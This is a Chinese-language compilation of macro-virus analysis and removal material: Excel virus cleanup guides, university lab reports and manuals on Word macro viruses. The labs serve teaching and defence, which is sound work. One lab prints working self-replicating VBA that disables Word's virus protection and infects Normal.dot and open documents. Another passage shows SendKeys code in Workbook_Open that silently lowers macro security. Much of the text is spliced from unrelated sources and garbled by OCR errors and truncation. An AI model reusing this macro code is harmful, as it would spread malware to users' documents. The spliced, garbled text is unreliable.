宏病毒分析及清除实验

Office文档是目前使用最多也是最常见的办公文档(它包含Word文档，Excel文档，PPT文档等)，以至于Office软件成了大家必备的软件，由于Office软件默认的安全级别为中，所以Office文档成了病毒攻击的目标，目前有许多Office文档病毒，以最近教科局出现的宏病毒为例，成了大家头疼的一件事，现就个人处理方法介绍如下，供大家参考与分享。

1、宏病毒的分析
Office文档中的宏是Office中最高级别的部分，平时大家很少用到，它能把繁重的工作简单化，默认的安全级别为中，宏病毒正是利用这一点通过网络、U盘等进行传播，中毒的电脑明显反应变慢，Office文档大小在不断变化，有的成倍增加，一个小小的电子表格就有2M之多，使用十分困难。

2、中毒后文件的特征
中毒后的Office文档，除大小变大外，每次打开都要求启用宏，不启用便不能打开Office文档，或者打开了，全是空白，如果使用杀毒软件，则会把文档删除，给用户带来许多麻烦。

Office软件运行缓慢，电脑经常死机等。

3、处理方法：
在网上下载“Office病毒专杀”工具（下载地址：http://ww /html/5254.html），解压后安装，界面如下:
点击全盘杀毒，即可对电脑中的Office病毒进行全面查杀。

备注：该软件使用前要关闭其他杀毒软件！。

关于财务部excel宏病毒(XF/Sic.gen)清除方法
请注意财务部门最近传递文件提示有病毒！目前电脑装有杀毒能清除病毒主体，但残余病毒体会重新激活病毒！
具体清除方法如下：
第一步：A、打开文件（如果能打开的话，有些防毒软件会直接杀掉） 选择菜单[插入] ----[名称] ----[定义]，如下图：
B、在打开的对话框中,会发现有如下图中所示居多“定义名称”。

此处就是病毒清理不完的根源！将里面内容全部删除。

C、正常情况如下图（若没有进行“定义名称”设定的情况下）
第二步：打开[我的电脑]的如下位置：
C:\Program Files\Microsoft Office\OFFICE11\XLSTART 删除里面的所有内容。

进行完以上步骤后，若excel程序提示其它异常的话，可以关闭程式重新运行即可。

提示：在进行此操作前请先将文件进行备份！。

---------------------------------------------------------------最新资料推荐------------------------------------------------------宏病毒分析实验(新)宏病毒分析实验一、实验目的及要求：通过本实验的学习，大家应该理解宏病毒的概念、病毒机制、编写方法、传播手段以及预防处理措施。

二、实验基本原理：宏病毒是也是脚本病毒的一种，由于它的特殊性，因此在这里单独算成一类。

宏病毒的前缀是：Macro，第二前缀是：Word、 Word97、 Excel、 Excel97（也许还有别的）其中之一。

凡是只感染 WORD97 及以前版本 WORD 文档的病毒采用 Word97 做为第二前缀，格式是：Macro. Word97；凡是只感染 WORD97 以后版本 WORD 文档的病毒采用 Word 做为第二前缀，格式是：Macro. Word；凡是只感染 EXCEL97 及以前版本 EXCEL 文档的病毒采用 Excel97 做为第二前缀，格式是：Macro. Excel97；凡是只感染 EXCEL97 以后版本 EXCEL 文档的病毒采用 Excel做为第二前缀，格式是：Macro. Excel，依此类推。

该类病毒的公有特性是能感染 OFFICE系列文档，然后通过OFFICE 通用模板进行传播，如：1 / 5著名的美丽莎(Macro. Melissa) 。

一个宏的运行, 特别是有恶意的宏程序的运行, 受宏的安全性的影响是最大的, 如果宏的安全性为高, 那么, 没有签署的宏就不能运行了, 甚至, 还能使部分 Excel 的功能失效.所以, 宏病毒在感染 Excel 之前, 会自行对 Excel 的宏的安全性进行修改,把宏的安全性设为低. Application. SendKeys%TMSs%L{RETURN} 仅修改这个还不行, 很多宏会涉及到 VisualBasic, 所以, 宏的安全性还要信任对于VisualBasic 项目的访问, 所以, 综合安全级别的修改, 就为 Application. SendKeys%TMSs%LT%v{RETURN} 如何判断信任还是不信任对于VisualBasic 项目的访问, 可以用出错捕获进行修改: OnErrorGoToEnd_Sub ‘ 其它功能的程序段ExitSub End_Sub: Application. SendKeys%TMSs%LT%v{RETURN} 本段程序的功能为: 一旦宏无法正常就进行宏的安全性的修改和对信任对于VisualBasic 项目的访问的修改, 从而这宏病毒的正常运行提供系统支持. 本程序应放在 VBA 中的 ThisWorkbook PrivateSubWorkbook_Open() EndSub 这样一旦打开工作薄就会对其进行有效的修改. 完整的程序为: PrivateSubWorkbook_Open() OnErrorGoToEnd_Sub ‘ 其它功能的程序段 ExitSub End_Sub: Application. SendKeys%TMSs%LT%v{RETURN} EndSub 三、主要仪器设备及实验耗材：PC 电脑一台四、实验内容或步骤：---------------------------------------------------------------最新资料推荐------------------------------------------------------ 1．启动 Word，创建一个新文档。

关于宏病毒的判断、清除和预防关于宏病毒的判断、清除和预防2011年01月15日星期六下午01：09关于宏病毒的判断和预防前两天从EXCEL论坛里下载了一个帖子的附件(当然我认为该帖的发表人也不知道文件里有病毒)，没想里面有宏病毒"StartUp.xls"在打开文件时提示，缺少"StartUp.xls"。

因为论坛里有很多附件是包含宏的，为了使用时方便，因此我EXCEL中关于宏安全性设置的是"低"。

没想到造成了大错，在此提醒各位一定要将EXCEL中"工具→宏→安全性→安全级"设置为中，打开文件时要确认该文件是否包含宏。

对于宏病毒的判断：当安全级选为中时，如果一旦发现自己的不包含宏的文件打开时提示该文件包含宏，那么恭喜你已经中招了。

此时一定要注意所有打开的文件(指WORD、EXCEL文件)不要存盘，因为宏病毒只有存盘后才会被感染，如果需要将文件进行保存，建议存储为TXT格式，然后从新进行排版。

一定要将打开的文件作好备份再进行杀毒。

我从昨日中午发现机器里被感染病毒，先后使用了"esetsmartsecurity""瑞星天空网站版""360杀毒软件最新版"，但前两个软件均没有查出该病毒。

只有360查了出来并将病毒清除。

注意：在杀毒时不要选择"自动处理扫描出的病毒威胁"因为杀毒软件有可能会直接将文件删除，到时重要文件被删掉可是哭都来不及了，当其查出中毒文件后如是重要文件一定要将其重新存储为TXT格式，也可以使用XP自带的"写字板"(注意不是记事本)将word文件直接打开，并将内容保存下来，然后再交给杀毒软件处理。

这样就能保证文件内容不会丢失了。

excel宏病毒是怎么来的随着Internet在中国的迅速拓展,特别是中国教育和科研计算机网(CERNET)以及商业性的ChinaNet和COMNet的发展,电子邮件同样成为许多网络用户使用的工具,互联的校园网络在促进学校科研教育发展的同时,也非常容易成为网络攻击的对象,特别是在网络建设的初期,网络安全意识和网络防范能力都较为薄弱.据透露,一种新的致命病毒---Hare病毒定于近期"发作".Hare病毒届时将显示HDEuthanasia的信息,然后企图重写计算机硬盘上的全部文件.英国《病毒公报》编辑IanWhalley指出,Hare极为复杂,而且很难查出.它是借Internet传播的,未激活版本已在几个国家发现,其中包括美国.另外一种新病毒属于被称为"宏病毒"的传染病毒家族,宏病毒于一年前首次被发现.这种新病毒称为roux,是首例感染Microsoft公司Excell 电子表格的病毒.Laroux的表现很像目前常见的Word.concept病毒,后者在MicrosoftWord生成的文档中传播.Laroux可做为电子表格的附件进入电子邮件,或以其他同电子表格相同的传送方式传播.据美国全国计算机安全协会(NCSA)称,这种病毒相对来说没有什么危害,但可导致少数系统的"应用软件异常".NCSA指出,Laroux看上去比Word.concept传播的速度要慢,因为Excel不像Word使用那么广泛,而且用户不常共用电子表格,而文字处理器文档则经常共用.去年，用户经受的宏病毒猛增了5倍，安全专家把这主要归结为一个因素--电子邮件的迅速增加。

目前的DOS杀毒工具都不能很好的自动杀除宏病毒。

华美星际公司这次推出病毒克星for WORD比较圆满地解决了该问题。

如果说Concept 病毒引出了Word 宏病毒的概念，“台湾1号”便引来了Word 宏病毒的发作，引来了人们对Word 宏病毒的重视。

WORD宏病毒发现及清除：根据宏病毒的传染机制，不难看出宏病毒传染中的特点。

所以发现宏病毒可以通过以下步聚进行：1 在自己使用的WORD中打开工具中的宏菜单，点中通用（Normal）模板，若发现有“AutoOpen”等自动宏，“FileSave”等文件操作宏或一些怪名字的宏，而自己又没有加载特殊模板，这就有可能有病毒了。

因为大多数用户的通用（Normal）模板中是没有宏的。

2 如发现打开一个文档，它未经任何改动，立即就有存盘操作，也有可能是Word带有病毒。

3 打开以DOC为后缀的文件在另存菜单中只能以模板方式存盘而此时通用模板中含有宏，也有可能是Word有病毒。

手工清除宏病毒的方法：1 打开宏菜单，在通用模板中删除您认为是病毒的宏。

2 打开带有病毒宏的文档（模板），然后打开宏菜单，在通用模板和病毒文件名模板中删除您认为是病毒的宏。

3 保存清洁文档。

4 对剩余文件重复步骤1－3。

特别值得注意的是英文版Word模板中的病毒在英文版Word中或更高版本的中文版Word才能被发现并清除，反之中文版有相同规律。

用杀毒工具自动清除宏病毒是理想的解决办法。

方法1 用Word Basic 语言以Word 模板方式编制杀毒工具，在Word 环境中杀毒。

方法2 根据Word BFF格式，在Word环境外解剖病毒文档（模板），去掉病毒宏。

方法1因为在Word 环境中杀毒，所以杀毒准确，兼容性好。

而方法2由于各个版本的Word BFF格式都不完全兼容，每次Word 升级它也必须跟着升级，兼容性不好。

目前有些DOS杀毒软件不是采用Word BFF格式去解剖病毒文档（模板），而是简单化的把病毒文档（模板）中的某些特征串填为了零，病毒宏无法被去除，杀毒后的文件长度与带病毒时的长度相等，这种做法有三个缺点：其一：容易将原文档破坏。

XI`AN TECHNOLOGICAL UNIVERSITY 实验报告一．实验目的1.理解WORD宏病毒的感染方式2.理解WORD宏病毒的工作原理3.掌握WORD宏病毒的杀毒方法二．实验原理WORD的文件建立是通过模板来创建的，模板是为了形成最终文档而提供的特殊文档，模板可以包括以下几个元素：菜单、宏、格式(如备忘录)等。

模板是文本、图形和格式编排的蓝图，对于某一类型的所有文档来说，文本、图像和格式编排都是类似的。

WORD提供了几种常见文档类型的模板，如备忘录、报告和商务信件。

你可以直接使用模板来创建新文档，或者加以修改，也可以创建自己的模板。

一般情况下，WORD自动将新文档基于缺省的公用模板NORMAL.DOT。

由此可以看出，模板在建立整个文档中起的作用是作为基类，文档继承模板的属性，包括宏、菜单、格式等。

另外，WORD还提供强大的宏功能。

宏是能组织到一起作为一个独立命令使用的一系列WORD命令，它能使日常工作变得更容易。

在WORD启动时，会自动加载NORMAL.DOT模板，以及它们所包含的宏。

您可以为宏指定特殊的名称，使其变为自动宏，以便在执行某一操作时，如：启动WORD或打开文档，就自动执行具有特殊命名的宏。

同其他宏一样，你可以将自动宏定义在一个共用模板上，也可以将其定义在一个特定模板上。

宏病毒主要寄生在以下3个宏中：AUTOOPEN、AUTONEW、AUTOCLOSE。

带病毒文档打开时，将病毒传染给NORMAL.DOT公用模板中，再由公用模板传染给所有其它正常的文档。

二．MOTHERSDAYVIRUS病毒感染机制MOTHERSDAYVIRUS宏病毒感染WORD文档和NORMAL.DOT文档。

被感染的WORD文档打开时或关闭时会首先弹出一个对话框，对话框关闭后再将控制权转移给正常的WORD文档执行。

MOTHERSDAYVIRUS使用DOCUMENT_OPEN宏（文档打开时执行）感染NORMAL.DOT，使用AUTOCLOSE自动宏感染其它文档。

宏病毒实验报告201424010257 邹文敏」、实验目的通过运行计算机代码，更加深刻的理解计算机代码。

对计算机代码有一个初步的认识。

加深对宏病毒的感性认识，宏病毒是感染数据文件word,office等。

二、实验内容运行自我复制，感染word公用模板和当前文档；具有一定破坏性的宏；清除宏病毒。

三、实验步骤实验一:将word文档中的开发者工具打开；word中心宀信任选项宀宏设计将信任选项打开茎用所有左,并且不通辺⑴禁用所有去r井岌出通知©I禁用乏啟宇転署比所有左回■启用所有潮海；可龍会运行有蓿在危脸的代码）㈢TT 瓷1运行第一个实验Visual Basic 宀normal 宀Microsoft 宀the documentProject T microsoft word 对象the document 复制如下代码：'APMPPrivate Sub Docume nt_Ope n()On Error Resume NextApplicatio n.DisplayStatusBar = FalseOpti on s.VirusProtect ion = FalseOptio ns.SaveNormalPrompt = False '以上都是基本的自我隐藏措施MyCode = ThisDocume nt.VBProject.VBCompo nen ts(1).CodeModule.Li nes(1,20) Set Host = NormalTemplate.VBProject.VBCompo nen ts(1).CodeModuleIf ThisDocume nt = NormalTemplate Then _Set Host = ActiveDocume nt.VBProject.VBComp onen ts(1).CodeModule With HostIf .L in es(1, 1) <> "'APMP" The n '判断感染标志.DeleteLi nes 1, .Cou ntOfLi nes '删除目标文件所有代码.InsertLines 1,MyCode '向目标文档写入病毒代码If ThisDocume nt = NormalTemplate Then _ActiveDocume nt.SaveAs ActiveDocume nt.FullNameEnd IfEnd WithMsgBox "Basic class macro by jackie", vbOKO nly, "APMP"End Sub保存时注意保存为宏文件实验一运行截图:清除实验一中的内容只需要删除， the document 中的内容在保存即可。

Excel宏病毒（ＢOＯK1病毒）处理方法症状:第一次打开带病毒的EXCEＬ文档时，会提示“是否启用宏”对话框,以后每次打开EXCEL 文档时就会自动弹出一个Book1文档。

传播途径:主要以发送邮件或使用Ｕ盘时，接收了带病毒的ＥXCEＬ文档。

处理步骤:1、首先进行病毒查杀：使用３60杀毒软件或瑞星杀毒软件查杀;2然后将病毒源进删除：在Ｃ:＼Proｇrａm Ｆilｅｓ\Ｍｉcrｏｓoft Offiｃe\ＯFFICＥ11＼xlstaｒt\下,然后将book1文件删除。

查毒方式:主要有360杀毒软件和瑞星杀毒软件两种，这里详细介绍瑞星杀毒软件的安装和使用方法。

ＳtａrtUｐ.xls宏病毒清除方法及步骤StaｒtUp.ｘｌs宏病毒的现象：ﻫ１.打开excel文件时提示有宏２.文件不能直接保存,只能另存3.打开eｘｃeｌ文件时,点击＂窗口"-＞"取消隐藏",会打开一个Sｔartuｐ．xls文件ﻫSｔarｔUｐ.xｌs宏病毒清除方法及步骤：(exｃel宏病毒)第一步:清除C:＼Ｄocuments aｎd Setｔings\aｄministｒａtor\Applicatｉon Data＼Miｃｒosoft\Eｘcｅl\ＸＬSTAＲT下的StartUp.ｘls；（注意：其中有些事隐藏文件,你看不到,按照下面说的做就可以看到那些隐藏文件：打开我的电脑》》工具》》文件夹选项》》“隐藏受保护的操作系统文件(推荐）”前面的勾打掉》》选中“显示隐藏的文件、文件夹和驱动器”》》去掉“隐藏已知文件类型的扩展名”的勾。

）第二步：清除C:\Docｕments ａnd Settｉngｓ\admｉｎiｓtrator\Appｌｉｃaｔion Data\Ｍicｒosｏft＼Eｘcel\的Exｃｅl１1．eｘe(约２36K）及Ｅxcｅｌ11.xｌｂ等名字中带有Excel1１的文件。

（删除后Exceｌ程序会自动创建部分文件）第三步:下载ｓｔaｒｔup.xlｓ并放入“C：＼Documents and Settiｎgs\adｍinisｔrator＼Apｐlicatioｎ Data\Miｃrｏsoｆt\Ｅxｃeｌ\ＸLSTAＲT\”。

宏病毒清除操作手册摘要：宏病毒是一种常见的计算机病毒，它利用办公软件中的宏功能进行传播和感染。

本文档旨在为用户提供一份清除宏病毒的操作手册，包含如何识别宏病毒、清除感染文件以及预防宏病毒传播的方法等。

通过遵循本手册中的操作指引，用户可以及时有效地清除宏病毒，提高计算机系统的安全性和稳定性。

1. 简介宏病毒是一种利用办公软件（如Microsoft Office）中的宏功能进行传播和感染的计算机病毒。

它通常存在于Office文档（如Word 文档、Excel文件等）中，并且可以通过下载、打开或共享这些文件来传播。

一旦感染，宏病毒可能对计算机系统和文件造成损害，甚至可能导致数据丢失和系统崩溃。

2. 识别宏病毒在清除宏病毒之前，首先需要能够准确识别它们。

以下是一些常见的识别方法：a. 注意文件扩展名：宏病毒通常会将文件扩展名更改为“.docm”、“.xlsm”等，以启用宏功能。

b. 观察异常行为：如果文档在打开后自动执行某些操作或显示不寻常的行为，很可能是宏病毒的迹象。

c. 启用安全模式：通过将办公软件启动到安全模式，可以禁用宏并防止其执行。

3. 清除宏病毒一旦确定文件被宏病毒感染，请按照以下步骤清除它：a. 先暂时关闭宏：打开Office软件，前往“选项”>“信任中心”>“信任中心设置”，在“宏设置”中选择“禁用所有宏”选项。

b. 打开感染文件：用Office软件打开感染文件，进入“开发人员”选项卡，点击“宏”按钮。

c. 删除宏代码：在弹出的“宏”窗口中，选中所有宏代码，点击“删除”按钮，然后关闭文件并不保存修改。

d. 执行杀毒扫描：使用可靠的杀毒软件对计算机进行全面扫描以确保宏病毒已清除。

4. 防止宏病毒传播除了及时清除感染文件外，预防宏病毒的传播也是非常重要的。

下面是一些建议：a. 更新办公软件：始终确保您使用的办公软件是最新版本，并及时安装官方提供的安全补丁和更新。

b. 禁用宏功能：如果您在日常工作中不需要使用宏功能，可以将其禁用，从根本上减少宏病毒的风险。

宏病毒实验报告一、实验目的本次实验旨在深入了解宏病毒的工作原理、传播方式以及其对计算机系统可能造成的危害，并通过实际操作和观察，探索有效的防范和清除策略。

二、实验环境1、操作系统：Windows 10 专业版2、办公软件：Microsoft Office 20193、杀毒软件：＿____杀毒软件三、实验原理宏病毒是一种寄存在文档或模板的宏中的计算机病毒。

当打开包含宏病毒的文档时，宏病毒会被自动激活，并执行其中的恶意代码。

宏病毒通常利用 Office 软件中的宏功能来实现自我复制、传播和破坏操作。

四、实验步骤1、准备带有宏病毒的测试文档从网络上获取已知的含有宏病毒的示例文档。

对获取的文档进行备份，以防对实验环境造成不可恢复的破坏。

2、观察宏病毒的激活过程打开带有宏病毒的文档。

留意弹出的警告提示，记录相关信息。

3、分析宏病毒的行为观察文档中的内容是否被篡改。

检查计算机系统的性能是否受到影响，如 CPU 使用率、内存占用等。

4、尝试清除宏病毒使用安装的杀毒软件进行扫描和清除。

手动删除相关的宏代码。

五、实验结果与分析1、宏病毒激活情况打开测试文档时，Office 软件弹出了宏安全警告，但仍可以选择启用宏。

一旦启用宏，病毒立即开始执行恶意操作。

2、宏病毒的行为表现文档中的部分文本被修改，格式变得混乱。

CPU 使用率短时间内飙升，系统运行变得卡顿。

3、清除效果杀毒软件能够检测到宏病毒，并成功清除大部分感染，但仍有部分残留。

手动删除宏代码后，文档恢复正常，系统性能也逐渐恢复。

六、实验结论1、宏病毒具有较强的隐蔽性和破坏性，能够在用户不知情的情况下对文档和系统造成损害。

2、办公软件的宏安全设置对于防范宏病毒至关重要，用户应保持较高的安全意识，不轻易启用来源不明的宏。

3、杀毒软件在宏病毒的清除方面起到了一定的作用，但仍需不断更新病毒库和优化清除算法，以应对不断变化的宏病毒威胁。

4、定期备份重要的文档和数据是防范宏病毒造成严重损失的有效措施。

实验四Word宏病毒试验专业班级学号姓名实验学时实验类型实验地点实验时间指导老师高虎实验成绩年月日一实验目的1. 演示宏的编写2. 说明宏的原理及其安全漏洞和缺陷3. 理解宏病毒的作用机制二实验环境Windows 系列操作系统Word2003 应用程序实验素材：experments 目录下的macro 目录的macro_1.txt。

三实验步骤1.软件设置：关闭杀毒软件的自动防护功能。

2.打开Word 2003，在工具 宏 安全性中，将安全级别设置为低，在可靠发行商选项卡中，选择信任任何所有安装的加载项和模板，选择信任visual basic 项目的访问。

3.自我复制功能演示。

一个word 文档，然后按Alt+F11 调用宏编写窗口（工VisualBasic 宏编辑器），在左侧的project—>Microsoft Word 对象 ThisDocument中输入源代码（参见源代码一或者从光盘上拷贝，位置为：“光盘盘符:\Experiment\macro\macro_1.txt‖），保存。

此时当前word 文档就含有宏病毒，只要下次打开这个word 文档，就会执行以上代码，并将自身复制到Normal.dot（word 文档的公共模板）和当前文档的ThisDocument 中，同时改变函数名（模板中为Document_Close，当前文档为Document_Open）。

此时所有的word 文档打开和关闭时，都将运行以上的病毒代码，可以加入适当的恶意代码，影响word 的正常使用，本例中只是简单的跳出一个提示框。

4. 清除宏病毒对每一个受感染的Word 文档进行如下操作：打开受感染的Word 文档，进入宏编辑环境（按Alt+F11 键），打开Normal|MicrosoftWord 对象|This Document，清除其中的病毒代码（只要删除所有内容即可）。

然后打开Project|Microsoft Word|This Document，清除其中的病毒代码。

计算机病毒实验报告实验3.2 台湾No.1宏病毒3.2 台湾No.1宏病毒3.2.1 实验目的了解台湾No.1宏病毒的基本概念实验自己的台湾No.1宏病毒3.2.2 实验原理台湾No.1宏病毒实际上是一个含有恶意代码的Word自动宏，其代码主要是造成恶作剧，并且有可能使用户计算机因为使用资源枯竭而瘫痪。

3.2.3 实验预备知识点】什么是Word宏对VBA语言有一定的了解3.2.4 实验环境操作系统：WINDOWS2000JDK版本：Java Standard Edition 1.4.0以上数据库：MysqlWeb服务器:TomacatOffice版本:MS office2000/20033.2.5 实验步骤打开“信息安全综合实验系统” 在右上角选择“实验导航”双击“病毒教学实验系统”进入病毒教学实验系统登录面界，输入用户名和密码。

（注意：实验前先关闭所有杀毒软件。

）1.病毒感染实验由于该病毒特征码明显，因此请首先将病毒防火墙关闭，将系统时间调整到13日。

进入病毒防护教学实验后，点击左侧的“台湾N0.1宏病毒”，然后在点击下面的“病毒感染实验”，要根据要求和提示操作配置客户端的邮件地址，如下图3-2-1所示。

根据提示下载提供的台湾No.1病毒，亲自运行并记录自己的实验报告。

图3-2-1 病毒样本下载页面2.病毒代码分析进入病毒防护教学实验后，点击左侧的“台湾N0.1宏病毒”，然后在点击下面的“病毒代码分析”，可以分析页面中的台湾No.1病毒源代码，根据相关代码分析，填写页面中空白的参数，点击确定系统将自动生成代码。

新建一个word文档作为自己编写的该病毒文件，然后把生成的代码复制并粘帖至Word自带的VBA编译工具中，可以参照美丽莎宏病毒实验中的图4-3至4-4 。

将自行编制的病毒备份待用。

3.杀毒实验进入病毒防护教学实验后，点击左侧的“台湾N0.1宏病毒”，然后在点击下面的“杀毒实验”，学习病毒防范方法，根据系统页面上的提示，使用手动杀毒，并写入实验报告中。

宏病毒分析及清除实验实验目的演示宏的编写说明宏的原理及其安全漏洞和缺陷理解宏病毒的作用机制。

实验环境Windows系列操作系统；Word 2003应用程序。

实验学时2学时，必做实验。

实验内容1．设置实验环境；2．打开带宏病毒的Word文档；3．查看感染过程，分析病毒；4．杀毒。

实验步骤：1．软件设置：关闭杀毒软件；打开Word 2003，在工具-宏-安全性中，将安全级别设置为低，在可靠发行商选项卡中，选择信任任何所有安装的加载项和模板，选择信任visual basic项目的访问。

注意：为了保证该实验不至于造成较大的破坏性，进行实验感染后，被感染终端不要打开过多的word文档，否则清除比较麻烦（对每个打开过的文档都要清除）。

２．运行宏病毒打开和创建若干.DOC文档，没有任何不正常的地方。

打开带有宏病毒的文件：“宏病毒.DOC”，存盘关闭。

查看感染过程3．自我复制功能演示。

新建或打开若干文档，查看自我复制和传染过程。

4．查看宏病毒打开一个“宏病毒.DOC”文档，然后按Alt+F11调用宏编写窗口（工具-宏-Visual Basic 宏编辑器）,在左侧的project-Microsoft Word对象-ThisDocument中查看到VB代码，保存，表明当前word文档含有宏病毒，并将自身复制到Normal.dot（word文档的公共模板中也可以看到相同的代码）。

此时所有的word文档打开和关闭时，都将运行以上的病毒代码，可以加入适当的恶意代码，影响word的正常使用，本例中只是简单的跳出一个提示框。

高明的病毒编写者其自我保护将做得非常好，可以使word的一些工具栏失效，例如将工具菜单中的宏选项屏蔽，也可以修改注册表达到很好的隐藏效果。

本例中只是屏蔽状态栏，以免显示宏的运行状态，并且修改公用模板时自动保存，不给用户提示。

5．清除宏病毒对每一个受感染的word文档进行如下操作：打开受感染的word文档，进入宏编辑环境（Alt+F11），打开Normal-Microsoft Word 对象-This Document，清除其中的病毒代码（只要删除所有内容即可）。

宏与宏病毒实验1.宏病毒介绍宏病毒是一种寄存在文档或模板的宏中的计算机病毒。

一旦打开这样的文档，其中的宏就会被执行，于是宏病毒就会被激活，转移到计算机上，并驻留在Normal模板上。

从此以后，所有自动保存的文档都会“感染”上这种宏病毒，而且如果其他用户打开了感染病毒的文档，宏病毒又会转移到他的计算机上。

如果某个文档中包含了宏病毒，我们称此文档感染了宏病毒；如果 WORD系统中的模板包含了宏病毒，我们称WORD系统感染了宏病毒。

所谓宏是将一系列word命令和指令组合起来，形成一个命令，实现任务执行的自动化。

在word中有一类很实用的自动宏，会在特定事件发生时自动运行，word提供的5个自动宏是：(1) Autoexec宏在启动word时自动运行；(2) Autoexit宏在退出word时自动运行；(3) Autonew宏在新建文档时自动运行；(4) Autoopen宏在打开文档时自动运行；(5) Autoclose宏在关闭文档时自动运行；2.实验环境实验环境：windows2000及以上或windows XP所需软件：office word3.实验步骤(1)首先，依次选择“工具”-“宏”-“录制宏”菜单命令，接着弹出“录制宏”界面，如下图：接着在“宏名”下面的输入框中输入新宏的名称“yuan ”，接着单击“键盘”图标。

在弹出的“自定义键盘”界面中指定快捷键，比如ctrl+y ，单击左下角“指定”按钮后，再单击右下角的“关闭”按钮，回到”录制宏“界面。

这时单击”确定“按钮启动记录器。

接着，依次选择“插入“-”符号“菜单命令，弹出”符号“界面。

选择”符号“选项卡，在”符号“框中选择”￥“，单击”插入“按钮后再单击”关闭“按钮。

单击“停止录制“工具栏中的”停止录制“按钮。

以后，当需要插入字符“￥”的时候，只需要按下ctrl+y组合键。

(2) 给word文档加上通用的密码关闭word文档，当再次打开文档的时候，需要输入密码才能看到内容和修改。

宏病毒分析一、宏病毒简介宏，就是软件设计者为了在使用软件工作时，避免一再的重复相同的动作而设计出来的一种工具。

它利用简单的语法，把常用的动作写成宏，当再工作时，就可以直接利用事先写好的宏自动运行，去完成某项特定的任务，而不必再重复相同的动作。

宏病毒是一种寄存在文档或模板的宏中计算机病毒。

一旦打开这样的文档，其中的宏就会被执行，于是宏病毒就会被激活，转移到计算机上，并驻留在Normal模板上。

从此以后所以自动保存的文档都会“感染”上这种宏病毒，而且如果其他用户打开了感染病毒的文档，宏病毒又会转移到他的计算机上。

宏病毒正式利用了在Word和其他办公软件如Excel中所具有的宏特征进行病毒感染，本质上，它是嵌入到字处理文档或其他类型文件中的一段可执行代码。

二、宏病毒特点（1）、宏病毒的主要破坏○1．对WORD运行的破坏是：不能正常打印；封闭或改变文件存储路径；将文件改名；乱复制文件；封闭有关菜单；文件无法正常编辑。

○2．对系统的破坏是：Word Basic语言能够调用系统命令，造成破坏。

（2）、宏病毒隐蔽性强，传播迅速，危害严重，难以防治与感染普通.EXE或.COM文件的病毒相比，Word宏病毒具有隐蔽性强，传播迅速，危害严重，难以治愈等特点。

（3）、宏病毒具体表现○1．隐蔽性强由于人们忽视了在传递一个文档时也会有传播病毒的机会。

○2．毒传播迅速因为办公数据的交流要比拷贝.EXE文件更加经常和频繁，如果说扼制盗版可以减少普通.EXE或.COM病毒传播的话，那么这一招对Word病毒将束手元策。

○3．危害严重无数的DOC文件从上级机关传播到基层，基层又上报到上级机关，从各个单位的办公室到工作者的家庭，到出版部门的计算机系统。

于是，便存在这样一种可能，当成千上万的计算机系统在传播和复制这些数据以及文档文件的同时，也在忠实地传播和复制这些病毒。

由于该病毒能跨越多种平台，并且针对数据文档进行破坏，因此具有极大的危害性，该病毒在公司通过内联网相互进行文档传送时，迅速蔓延，往往很快就能使公司的机器全部染上病毒。